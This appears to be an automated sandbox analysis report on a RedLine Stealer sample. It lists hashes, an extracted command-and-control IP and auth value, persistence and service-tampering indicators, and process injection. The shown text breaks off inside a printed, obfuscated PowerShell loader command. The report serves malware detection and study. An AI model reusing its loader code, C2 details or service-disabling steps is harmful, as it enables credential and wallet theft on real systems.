Analysis
-
max time kernel
151s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2023, 19:05
Static task
static1
Behavioral task
behavioral1
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win10v2004-20220812-en
General
-
Target
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
-
Size
361KB
-
MD5
18852c1659b6641a1f4eeacf6ce6bb8d
-
SHA1
1d678410484e34165adb652f7e86a2b5cae5f58d
-
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
-
SHA512
86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
-
SSDEEP
6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2308-174-0x0000000000620000-0x0000000000640000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4440 created 3344 4440 WerFault.exe 40 PID 1356 created 3452 1356 WerFault.exe 38 PID 3736 created 2348 3736 WerFault.exe 132 PID 5024 created 4328 5024 WerFault.exe 135 -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 3992 created 2824 3992 SmartDefRun.exe 42 PID 3992 created 2824 3992 SmartDefRun.exe 42 PID 3992 created 2824 3992 SmartDefRun.exe 42 PID 3992 created 2824 3992 SmartDefRun.exe 42 PID 836 created 604 836 powershell.EXE 3 PID 4444 created 3344 4444 svchost.exe 40 PID 4444 created 3452 4444 svchost.exe 38 PID 4444 created 2348 4444 svchost.exe 132 PID 4444 created 4328 4444 svchost.exe 135 -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 4712 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 3080 C4Loader.exe 4348 new2.exe 3896 SysApp.exe 3992 SmartDefRun.exe 716 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3900 set thread context of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 4348 set thread context of 2308 4348 new2.exe 95 PID 3992 set thread context of 1924 3992 SmartDefRun.exe 119 PID 836 set thread context of 2340 836 powershell.EXE 124 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 492 sc.exe 3532 sc.exe 3052 sc.exe 4648 sc.exe 4888 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 4956 3900 WerFault.exe 77 2428 4348 WerFault.exe 91 3560 3344 WerFault.exe 40 2304 3452 WerFault.exe 38 100 2348 WerFault.exe 132 3572 4328 WerFault.exe 135 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3436 schtasks.exe 4792 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Jan 2023 19:06:26 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4712 powershell.exe 4712 powershell.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 3896 SysApp.exe 2308 vbc.exe 3992 SmartDefRun.exe 3992 SmartDefRun.exe 4320 powershell.exe 4320 powershell.exe 3992 SmartDefRun.exe 3992 SmartDefRun.exe 3992 SmartDefRun.exe 3992 SmartDefRun.exe 4808 powershell.exe 4808 powershell.exe 3992 SmartDefRun.exe 3992 SmartDefRun.exe 3244 powershell.EXE 836 powershell.EXE 836 powershell.EXE 3244 powershell.EXE 836 powershell.EXE 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 3560 WerFault.exe 3560 WerFault.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2304 WerFault.exe 2304 WerFault.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe 2340 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2824 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4712 powershell.exe Token: SeDebugPrivilege 2308 vbc.exe Token: SeDebugPrivilege 4320 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 2700 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3900 wrote to memory of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 3900 wrote to memory of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 3900 wrote to memory of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 3900 wrote to memory of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 3900 wrote to memory of 5068 3900 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 79 PID 5068 wrote to memory of 4712 5068 vbc.exe 83 PID 5068 wrote to memory of 4712 5068 vbc.exe 83 PID 5068 wrote to memory of 4712 5068 vbc.exe 83 PID 4712 wrote to memory of 3080 4712 powershell.exe 90 PID 4712 wrote to memory of 3080 4712 powershell.exe 90 PID 4712 wrote to memory of 3080 4712 powershell.exe 90 PID 4712 wrote to memory of 4348 4712 powershell.exe 91 PID 4712 wrote to memory of 4348 4712 powershell.exe 91 PID 4712 wrote to memory of 4348 4712 powershell.exe 91 PID 4712 wrote to memory of 3896 4712 powershell.exe 93 PID 4712 wrote to memory of 3896 4712 powershell.exe 93 PID 4712 wrote to memory of 3896 4712 powershell.exe 93 PID 4712 wrote to memory of 3992 4712 powershell.exe 94 PID 4712 wrote to memory of 3992 4712 powershell.exe 94 PID 4348 wrote to memory of 2308 4348 new2.exe 95 PID 4348 wrote to memory of 2308 4348 new2.exe 95 PID 4348 wrote to memory of 2308 4348 new2.exe 95 PID 4348 wrote to memory of 2308 4348 new2.exe 95 PID 4348 wrote to memory of 2308 4348 new2.exe 95 PID 4804 wrote to memory of 492 4804 cmd.exe 109 PID 4804 wrote to memory of 492 4804 cmd.exe 109 PID 4804 wrote to memory of 3532 4804 cmd.exe 110 PID 4804 wrote to memory of 3532 4804 cmd.exe 110 PID 4804 wrote to memory of 3052 4804 cmd.exe 111 PID 4804 wrote to memory of 3052 4804 cmd.exe 111 PID 4804 wrote to memory of 4648 4804 cmd.exe 112 PID 4804 wrote to memory of 4648 4804 cmd.exe 112 PID 4804 wrote to memory of 4888 4804 cmd.exe 113 PID 4804 wrote to memory of 4888 4804 cmd.exe 113 PID 4804 wrote to memory of 3612 4804 cmd.exe 114 PID 4804 wrote to memory of 3612 4804 cmd.exe 114 PID 4804 wrote to memory of 4932 4804 cmd.exe 115 PID 4804 wrote to memory of 4932 4804 cmd.exe 115 PID 4804 wrote to memory of 4924 4804 cmd.exe 116 PID 4804 wrote to memory of 4924 4804 cmd.exe 116 PID 4804 wrote to memory of 4960 4804 cmd.exe 117 PID 4804 wrote to memory of 4960 4804 cmd.exe 117 PID 4804 wrote to memory of 2720 4804 cmd.exe 118 PID 4804 wrote to memory of 2720 4804 cmd.exe 118 PID 3992 wrote to memory of 1924 3992 SmartDefRun.exe 119 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 836 wrote to memory of 2340 836 powershell.EXE 124 PID 2340 wrote to memory of 604 2340 dllhost.exe 3 PID 2340 wrote to memory of 672 2340 dllhost.exe 2 PID 2340 wrote to memory of 960 2340 dllhost.exe 10 PID 2340 wrote to memory of 376 2340 dllhost.exe 9 PID 2340 wrote to memory of 524 2340 dllhost.exe 11 PID 2340 wrote to memory of 656 2340 dllhost.exe 73 PID 2340 wrote to memory of 1032 2340 dllhost.exe 72 PID 2340 wrote to memory of 1040 2340 dllhost.exe 16 PID 2340 wrote to memory of 1164 2340 dllhost.exe 13 PID 2340 wrote to memory of 1180 2340 dllhost.exe 15
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:604
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:376
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{88a03707-cf97-4eaa-8ba3-4076c0137abe}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2340
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1164 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2420
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OqTqqnxpxUUB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JHOegpovOyGbdf,[Parameter(Position=1)][Type]$POXkxkJVKj)$pStdVAjQfcE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',P'+'u'+''+'b'+'l'+[Char](105)+'c'+','+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'ss'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$pStdVAjQfcE.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JHOegpovOyGbdf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+'d'+'');$pStdVAjQfcE.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'ic,'+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+'ew'+'S'+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$POXkxkJVKj,$JHOegpovOyGbdf).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'ime,'+'M'+'an'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $pStdVAjQfcE.CreateType();}$hZPKikVsfUJWx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 